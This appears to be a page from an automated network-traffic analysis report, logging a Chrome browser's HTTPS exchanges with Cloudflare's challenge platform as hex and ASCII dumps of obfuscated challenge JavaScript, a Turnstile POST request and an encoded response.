                                                                2025-01-10 21:29:04 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25
                                                                Data Ascii: eferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","time_check_cached_warning":"Your%20device%20clock%
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 2c 66 4e 2c 66 4f 2c 66 59 2c 67 39 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 39 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 34 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 30 32 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 30 34 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 34 37 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 34 39 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 32 34 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67
                                                                Data Ascii: ,fN,fO,fY,g9,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(439))/1*(parseInt(gI(664))/2)+-parseInt(gI(602))/3*(-parseInt(gI(504))/4)+parseInt(gI(1647))/5+-parseInt(gI(1649))/6*(-parseInt(gI(624))/7)+-parseInt(g
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 29 7b 69 66 28 68 75 3d 67 4a 2c 6f 3d 7b 27 69 6a 6c 57 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 65 6f 6c 46 49 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 69 77 5a 47 44 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 62 50 79 4d 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 66 77 77 52 56 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 6e 4e 6b 69 52 27 3a 68 75 28 31 35 30 32 29 2c 27 54 52 6b 4d 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d
                                                                Data Ascii: ){if(hu=gJ,o={'ijlWl':function(G,H){return H===G},'eolFI':function(G,H,I,J){return G(H,I,J)},'iwZGD':function(G,H){return G(H)},'bPyMO':function(G,H){return H===G},'fwwRV':function(G,H){return H===G},'nNkiR':hu(1502),'TRkMN':function(G,H,I){return G(H,I)}
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 5b 6b 5d 5d 5b 6d 5d 29 29 26 26 28 69 5b 68 78 28 35 35 30 29 5d 28 66 38 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 68 78 28 38 30 39 29 5d 28 69 5b 68 78 28 31 30 38 35 29 5d 28 27 6f 2e 27 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 68 78 28 31 33 34 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 68 79 29 7b 69 66 28 68 79 3d 68 78 2c 68 79 28 38 38 30 29 21 3d 3d 68 79 28 38 38 30 29 29 6d 28 6c 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 69 5b 68 79 28 39 32 39 29 5d 28 27 6f 2e 27 2c 6e 29 7d 29 7d 2c 65 4d 5b 67 4a 28 37 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 7a 2c 63 2c 64 29 7b 68 7a 3d 67 4a 2c 63 3d 31 2c 64 3d 31 65 33 2a 65 4d 5b 68 7a 28 37 34 37 29 5d
                                                                Data Ascii: [k]][m]))&&(i[hx(550)](f8,h[j[k]][m])||g[l][hx(809)](i[hx(1085)]('o.',h[j[k]][m]))),m++);}else g[l]=h[j[k]][hx(1347)](function(n,hy){if(hy=hx,hy(880)!==hy(880))m(l);else return i[hy(929)]('o.',n)})},eM[gJ(794)]=function(hz,c,d){hz=gJ,c=1,d=1e3*eM[hz(747)]
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 28 37 33 32 29 5d 2e 63 48 29 2c 27 2f 27 29 2b 65 4d 5b 68 42 28 37 33 32 29 5d 5b 68 42 28 31 31 34 31 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 68 42 28 34 31 38 29 5d 3d 65 4d 5b 68 42 28 37 33 32 29 5d 5b 68 42 28 34 31 38 29 5d 2c 6e 5b 68 42 28 35 33 34 29 5d 3d 65 4d 5b 68 42 28 37 33 32 29 5d 5b 68 42 28 35 33 34 29 5d 2c 6e 5b 68 42 28 34 35 30 29 5d 3d 65 4d 5b 68 42 28 37 33 32 29 5d 5b 68 42 28 34 35 30 29 5d 2c 6e 5b 68 42 28 31 32 37 36 29 5d 3d 65 4d 5b 68 42 28 37 33 32 29 5d 5b 68 42 28 38 39 36 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 68 42 28 39 38 36 29 29 5d 28 29 2c 21 73 29 72 65 74 75 72 6e 3b 78 3d 68 42 28 31 31 35 30 29 2c 73 5b 68 42 28 31 30 35 30 29 5d 28 78 2c 6d 2c 21 21 5b 5d 29 2c 73 5b 68 42 28 32 38 32 29 5d 3d 35 65 33
                                                                Data Ascii: (732)].cH),'/')+eM[hB(732)][hB(1141)],n={},n[hB(418)]=eM[hB(732)][hB(418)],n[hB(534)]=eM[hB(732)][hB(534)],n[hB(450)]=eM[hB(732)][hB(450)],n[hB(1276)]=eM[hB(732)][hB(896)],o=n,s=new eM[(hB(986))](),!s)return;x=hB(1150),s[hB(1050)](x,m,!![]),s[hB(282)]=5e3
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 37 39 29 5d 3d 69 2c 6d 5b 68 43 28 31 30 34 30 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 35 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 45 2c 6a 2c 6b 2c 6c 2c 6d 2c 76 2c 6e 2c 6f 29 7b 69 66 28 68 45 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 45 28 35 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 2b 76 7d 2c 6a 5b 68 45 28 31 32 35 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 26 76 7d 2c 6a 5b 68 45 28 39 32 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 3c 76 7d 2c 6a 5b 68 45 28 38 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 2b 76 7d 2c 6a 5b 68 45 28 31 35 34 32 29 5d 3d 66 75 6e 63 74 69
                                                                Data Ascii: 79)]=i,m[hC(1040)]=d,m},eM[gJ(597)]=function(e,f,g,h,i,hE,j,k,l,m,v,n,o){if(hE=gJ,j={},j[hE(581)]=function(s,v){return s+v},j[hE(1251)]=function(s,v){return s&v},j[hE(923)]=function(s,v){return s<<v},j[hE(882)]=function(s,v){return s+v},j[hE(1542)]=functi
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 5d 28 65 5b 69 72 28 34 39 36 29 5d 2c 64 5b 69 72 28 31 35 38 31 29 5d 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 4d 29 7d 29 2c 66 4f 3d 21 5b 5d 2c 21 66 66 28 67 4a 28 31 35 34 30 29 29 26 26 28 67 63 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 6a 32 2c 63 2c 64 2c 65 29 7b 6a 32 3d 67 4a 2c 63 3d 7b 27 45 75 57 63 53 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 67 7d 2c 27 64 72 62 62 74 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 6a 32 28 37 33 32 29 5d 5b 6a 32 28 31 31 33 38 29 5d 7c 7c 31 65 34 2c 65 3d 67 61 28 29 2c 21 65 4d 5b 6a 32 28 35 31 32 29 5d 26 26 21 66 50 28 29 26 26 21 65 4d 5b 6a 32 28 31 35 34 31 29 5d 5b 6a 32
                                                                Data Ascii: ](e[ir(496)],d[ir(1581)])&&clearInterval(fM)}),fO=![],!ff(gJ(1540))&&(gc(),setInterval(function(j2,c,d,e){j2=gJ,c={'EuWcS':function(f,g){return f>g},'drbbt':function(f){return f()}},d=eM[j2(732)][j2(1138)]||1e4,e=ga(),!eM[j2(512)]&&!fP()&&!eM[j2(1541)][j2
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 46 6b 58 52 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 70 54 53 65 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6d 79 4e 70 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6b 4a 5a 42 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 42 51 65 59 45 27 3a 6a 76 28 31 30 38 34 29 2c 27 67 45 46 74 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 4c 70 64 78 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c
                                                                Data Ascii: e':function(h,i){return h&i},'FkXRt':function(h,i){return h<<i},'pTSeN':function(h,i){return h(i)},'myNpg':function(h,i){return h-i},'kJZBO':function(h,i){return i!==h},'BQeYE':jv(1084),'gEFtU':function(h,i){return h(i)},'LpdxZ':function(h,i){return i*h},
                                                                2025-01-10 21:29:04 UTC1369INData Raw: 5b 6a 7a 28 38 30 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 4f 7c 48 3c 3c 31 2e 39 33 2c 64 5b 6a 7a 28 37 30 33 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 7a 28 38 30 39 29 5d 28 64 5b 6a 7a 28 34 35 39 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 6a 7a 28 31 35 36 36 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 7a 28 32 37 39 29 5d 28 31 36 2c 73 29 3b 48 3d 48 3c 3c 31 7c 64 5b 6a 7a 28 31 33 31 30 29 5d 28 4f 2c 31 29 2c 64 5b 6a 7a 28 37 30 33 29 5d 28 49 2c 64 5b 6a 7a 28 38 35 39 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 7a 28 38 30 39 29 5d 28 6f 28 48 29
                                                                Data Ascii: [jz(809)](o(H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;s<F;H=O|H<<1.93,d[jz(703)](I,j-1)?(I=0,G[jz(809)](d[jz(459)](o,H)),H=0):I++,O=0,s++);for(O=C[jz(1566)](0),s=0;d[jz(279)](16,s);H=H<<1|d[jz(1310)](O,1),d[jz(703)](I,d[jz(859)](j,1))?(I=0,G[jz(809)](o(H)


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.849738104.18.94.414431668C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 21:29:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1506905147:1736543691:qWm6d2kqJeBcoMXcOBdKbGs-8PtwqPXx_PidT5SMh3c/8fffc2a2e94d0f6c/Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                Content-Length: 3198
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                Content-type: application/x-www-form-urlencoded
                                                                CF-Chl-RetryAttempt: 0
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                CF-Challenge: Z9zyp4cv0i.1z13rK0jG3Je3S8TQMQE2_LVGB3fNMWc-1736544543-1.1.1.1-iwMfGE7PmDzhS59EF55WpMgLXu77eO.BaOVVBK8R5.bxFkjQiM9D9_mo9snrILnG
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://challenges.cloudflare.com
                                                                Sec-Fetch-Site: same-origin
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/wd4yk/0x4AAAAAAA3OlbOSAWayoimi/auto/fbE/normal/auto/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-10 21:29:04 UTC3198OUTData Raw: 76 5f 38 66 66 66 63 32 61 32 65 39 34 64 30 66 36 63 3d 61 79 4f 72 6b 72 78 72 4d 72 30 72 74 68 6d 2d 68 6d 50 72 68 58 33 25 32 62 34 53 58 6d 4e 68 42 42 6d 6c 77 6d 33 70 72 68 31 6d 48 72 33 4f 53 33 64 31 4f 6d 24 56 31 6d 41 71 68 44 61 6d 4c 72 68 50 4f 6d 33 66 67 79 54 7a 6d 66 2b 6d 6e 6d 68 79 6d 66 4f 57 70 6d 77 6d 54 70 33 42 6d 2b 70 56 4f 6d 4d 76 58 54 53 6d 4b 51 4f 54 50 52 72 33 37 6d 35 64 62 55 32 63 57 72 56 35 68 51 24 6e 58 78 6e 50 35 6d 42 70 54 62 30 6d 4f 36 35 66 62 70 6d 4a 44 6d 6d 44 72 33 31 61 64 4d 47 4a 76 24 46 54 51 50 38 77 47 24 37 49 44 34 56 6d 76 5a 79 42 77 6d 6d 4b 44 6b 48 62 6d 54 77 6d 4f 52 57 42 56 48 56 46 51 30 77 71 62 36 77 56 34 24 41 6d 48 79 6d 49 72 6d 47 54 6b 63 48 6a 51 58 58 63 72 68 62 6d
                                                                Data Ascii: v_8fffc2a2e94d0f6c=ayOrkrxrMr0rthm-hmPrhX3%2b4SXmNhBBmlwm3prh1mHr3OS3d1Om$V1mAqhDamLrhPOm3fgyTzmf+mnmhymfOWpmwmTp3Bm+pVOmMvXTSmKQOTPRr37m5dbU2cWrV5hQ$nXxnP5mBpTb0mO65fbpmJDmmDr31adMGJv$FTQP8wG$7ID4VmvZyBwmmKDkHbmTwmORWBVHVFQ0wqb6wV4$AmHymIrmGTkcHjQXXcrhbm
                                                                2025-01-10 21:29:05 UTC751INHTTP/1.1 200 OK
                                                                Date: Fri, 10 Jan 2025 21:29:04 GMT
                                                                Content-Type: text/plain; charset=UTF-8
                                                                Content-Length: 153008
                                                                Connection: close
                                                                cf-chl-gen: SyxGU5Uv2roL5R0RyiErmXISyKqVG0u224Xn1UxvyOPzE4JIbHauUyb3nsnqzb6huoingHCF1bzza0AlBDzt/Slq4l7ZjH0SQFfTwTGRZzumzRQJXbf4dnyYXvj1z3sEDTPmG1id4eIbZUggV78BsMLyMM8V0ppeklN/JMW454t7hJETYPyCaipCvCiUPq3YD5TBTqHMMepcyTOskHtesJr3Oysd6+4ThTfKD8IDEfeL8q2Pfy7kUSJ3buSHlRp73pZaWIJmzykoXL6EmZ/NW5zrggT8XopbYQrdYrivu9Ea4rhY2Bzers2V3Px+AhUMwW3Hk6wIiRPp5dqL+5tt3Sf6QGcpnEZkEoxHqjQtDFWI8FycVumzbhTdLdg2V1VFr1do3VoOjqGq2F2PCFozeRY9JjBv42i5wIP+zK2UMaA4Ezk52WEmnY9BLbtz3hF1WVwVzGIxYy5W7dE48xT3N2rkRDyWLkUQo/DFtZ8bi2M=$h7endqpnfR7Zc6cV9slBSA==
                                                                Server: cloudflare
                                                                CF-RAY: 8fffc2ad8dd242c6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-10 21:29:05 UTC618INData Raw: 5a 47 4b 4c 69 34 78 77 6e 4a 46 62 69 58 70 33 57 56 68 37 62 33 74 79 68 31 36 44 68 6e 4e 6e 68 61 4b 58 66 35 32 62 71 4b 65 75 64 6d 6d 45 74 70 61 6a 75 4c 4b 54 76 33 2b 39 71 37 4f 78 66 70 4b 5a 76 37 32 64 79 4b 4f 4a 6f 38 43 35 72 4b 54 44 76 4e 53 57 76 35 6a 61 6c 37 72 49 79 61 76 61 7a 36 37 52 75 39 6d 78 31 74 48 43 75 4d 50 4c 32 37 2f 4b 79 65 44 6d 37 4e 7a 63 72 2b 44 67 34 50 71 36 30 73 71 31 2b 75 7a 35 75 64 48 79 37 2b 37 32 42 63 62 53 42 38 72 5a 37 4e 6a 38 43 39 7a 70 45 73 76 72 34 51 50 6b 37 2b 55 4f 48 51 34 5a 44 68 54 79 46 66 33 37 4a 69 59 54 33 79 59 49 42 79 54 6a 34 43 45 45 41 77 59 6c 41 43 55 48 38 41 30 6e 39 51 34 53 4d 52 38 30 45 79 77 54 2f 68 6b 37 2b 50 37 2b 4a 68 70 44 50 55 68 51 42 77 31 51 48 45 39
                                                                Data Ascii: ZGKLi4xwnJFbiXp3WVh7b3tyh16DhnNnhaKXf52bqKeudmmEtpajuLKTv3+9q7OxfpKZv72dyKOJo8C5rKTDvNSWv5jal7rIyavaz67Ru9mx1tHCuMPL27/KyeDm7Nzcr+Dg4Pq60sq1+uz5udHy7+72BcbSB8rZ7Nj8C9zpEsvr4QPk7+UOHQ4ZDhTyFf37JiYT3yYIByTj4CEEAwYlACUH8A0n9Q4SMR80EywT/hk7+P7+JhpDPUhQBw1QHE9
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 41 6c 56 46 74 71 48 53 4e 63 4a 79 39 4c 57 30 56 54 61 57 56 42 64 55 78 75 52 48 51 75 53 46 4a 2b 61 6d 70 79 66 6d 35 41 68 6b 52 68 67 57 70 33 67 33 56 72 57 30 70 75 62 6c 2b 44 56 49 31 34 55 5a 70 54 6b 32 5a 79 66 59 2b 5a 64 5a 6c 62 67 34 57 56 59 70 32 61 5a 6f 64 34 59 34 42 70 63 47 4f 6f 61 6f 65 42 71 33 65 46 6a 4a 4f 76 74 5a 75 31 6c 33 32 39 6d 62 6c 32 66 35 4f 59 76 49 6a 4b 79 4a 69 37 71 49 79 4b 79 4b 37 41 71 72 4c 56 6f 4e 6d 6d 7a 72 75 31 6c 73 2b 78 34 4e 2f 66 74 4d 4c 6d 74 37 54 43 77 75 62 4a 75 72 72 6e 70 74 33 61 71 38 6a 52 34 63 54 44 35 74 54 4b 38 72 7a 52 79 39 58 52 2b 4e 54 44 37 74 48 69 38 41 62 36 42 66 30 4f 2b 66 37 48 34 73 7a 4c 32 2f 37 78 41 77 41 4a 47 68 73 4a 33 42 6a 6f 38 2b 6a 30 44 68 30 46 47
                                                                Data Ascii: AlVFtqHSNcJy9LW0VTaWVBdUxuRHQuSFJ+ampyfm5AhkRhgWp3g3VrW0publ+DVI14UZpTk2ZyfY+ZdZlbg4WVYp2aZod4Y4BpcGOoaoeBq3eFjJOvtZu1l329mbl2f5OYvIjKyJi7qIyKyK7AqrLVoNmmzru1ls+x4N/ftMLmt7TCwubJurrnpt3aq8jR4cTD5tTK8rzRy9XR+NTD7tHi8Ab6Bf0O+f7H4szL2/7xAwAJGhsJ3Bjo8+j0Dh0FG
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 74 5a 47 63 77 55 56 6f 75 53 6d 56 6d 59 57 4e 56 52 7a 74 62 4f 6b 35 62 53 6c 56 52 4f 6c 5a 64 4f 48 31 64 56 57 65 4c 57 34 4e 4e 68 45 39 44 69 32 36 4d 6b 45 39 76 59 6f 47 49 63 32 74 73 6c 48 4f 63 65 58 68 30 57 71 56 31 70 59 61 69 6c 4a 31 6e 64 58 36 47 69 57 36 4f 62 58 47 4e 73 5a 57 6c 69 6d 79 37 64 61 36 76 73 71 79 69 75 4a 43 44 78 4a 6d 47 74 63 43 46 78 6f 53 31 74 38 61 71 6b 63 72 42 31 62 36 52 78 62 69 6d 31 4b 36 58 33 61 69 71 73 70 32 73 76 74 61 65 34 37 32 77 75 64 6e 44 34 4f 47 39 32 38 50 48 71 76 44 76 31 4f 66 6e 36 74 4b 30 75 4e 72 33 76 4c 47 2b 37 66 50 32 77 62 65 39 41 39 50 46 43 63 47 2b 33 4f 73 41 79 77 6e 4a 35 67 7a 4f 30 66 48 7a 44 4f 66 53 47 52 59 41 47 66 48 61 46 78 6f 64 4a 76 51 67 45 66 63 6c 4a 43
                                                                Data Ascii: tZGcwUVouSmVmYWNVRztbOk5bSlVROlZdOH1dVWeLW4NNhE9Di26MkE9vYoGIc2tslHOceXh0WqV1pYailJ1ndX6GiW6ObXGNsZWlimy7da6vsqyiuJCDxJmGtcCFxoS1t8aqkcrB1b6Rxbim1K6X3aiqsp2svtae472wudnD4OG928PHqvDv1Ofn6tK0uNr3vLG+7fP2wbe9A9PFCcG+3OsAywnJ5gzO0fHzDOfSGRYAGfHaFxodJvQgEfclJC
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 55 47 6c 52 4d 32 78 43 4f 6e 73 32 50 57 68 53 54 57 4b 44 59 48 57 42 56 30 52 41 53 55 42 66 66 59 4a 37 65 30 68 77 59 6e 52 55 6c 58 53 52 64 47 31 75 57 6c 61 61 63 4b 42 38 65 4b 43 43 56 70 32 53 67 5a 4b 48 5a 6f 4b 61 67 5a 2b 49 67 33 36 68 68 57 61 49 69 36 71 33 61 35 5a 35 6d 37 4a 30 69 58 6d 69 66 62 4b 75 6e 4a 4b 44 78 4d 4b 66 69 62 61 67 79 73 2b 67 76 70 75 7a 6e 4d 43 31 7a 5a 61 5a 32 35 53 63 31 4b 72 4d 7a 35 6e 63 76 2b 57 65 70 75 4f 77 78 62 62 59 36 4c 6e 72 70 64 6d 38 34 2b 54 68 79 38 44 77 34 65 4f 36 31 75 6d 7a 36 72 33 53 38 65 76 79 2f 4e 6a 6b 41 66 76 37 34 2f 58 33 41 39 76 42 2b 75 37 75 2b 78 50 32 46 65 73 4a 43 4f 72 37 36 76 72 51 30 66 6e 68 38 50 66 69 4a 52 73 56 45 78 77 57 4b 65 62 39 49 53 77 52 48 7a 54
                                                                Data Ascii: UGlRM2xCOns2PWhSTWKDYHWBV0RASUBffYJ7e0hwYnRUlXSRdG1uWlaacKB8eKCCVp2SgZKHZoKagZ+Ig36hhWaIi6q3a5Z5m7J0iXmifbKunJKDxMKfibagys+gvpuznMC1zZaZ25Sc1KrMz5ncv+WepuOwxbbY6Lnrpdm84+Thy8Dw4eO61umz6r3S8evy/NjkAfv74/X3A9vB+u7u+xP2FesJCOr76vrQ0fnh8PfiJRsVExwWKeb9ISwRHzT
                                                                2025-01-10 21:29:05 UTC1369INData Raw: 57 4e 70 4e 58 68 6f 54 31 74 53 67 32 78 6a 65 33 31 65 65 6c 56 59 53 6b 4e 74 52 6d 31 52 58 47 4e 2b 5a 34 4e 6b 6d 47 70 54 66 46 53 58 69 6d 32 66 64 35 75 62 64 6e 69 65 70 6f 47 58 69 61 6c 70 69 5a 6d 41 68 59 32 48 5a 5a 47 6b 6e 6f 43 79 69 72 57 45 6e 4a 4e 34 65 35 61 54 72 5a 79 7a 75 5a 58 47 76 71 6d 48 6c 62 66 47 78 4d 2b 34 6d 38 71 65 7a 36 37 55 6f 4b 61 6d 74 70 69 79 72 5a 6a 4a 30 4e 71 79 35 4c 62 53 77 61 2f 70 32 64 4c 46 6f 73 79 33 76 4d 36 76 72 61 37 56 79 62 44 73 75 4e 50 32 30 4e 54 4d 79 38 79 35 39 2f 7a 39 34 37 76 76 7a 39 50 52 31 4d 55 4c 34 4d 51 4c 38 4e 45 4d 42 42 62 54 41 75 2f 4b 42 4f 4d 4c 2b 2f 33 6e 2b 43 41 69 47 39 37 38 48 76 41 69 35 66 45 6a 43 78 62 6f 4d 4f 58 76 43 77 50 38 44 67 45 69 38 44 6f 77
                                                                Data Ascii: WNpNXhoT1tSg2xje31eelVYSkNtRm1RXGN+Z4NkmGpTfFSXim2fd5ubdniepoGXialpiZmAhY2HZZGknoCyirWEnJN4e5aTrZyzuZXGvqmHlbfGxM+4m8qez67UoKamtpiyrZjJ0Nqy5LbSwa/p2dLFosy3vM6vra7VybDsuNP20NTMy8y59/z947vvz9PR1MUL4MQL8NEMBBbTAu/KBOML+/3n+CAiG978HvAi5fEjCxboMOXvCwP8DgEi8Dow
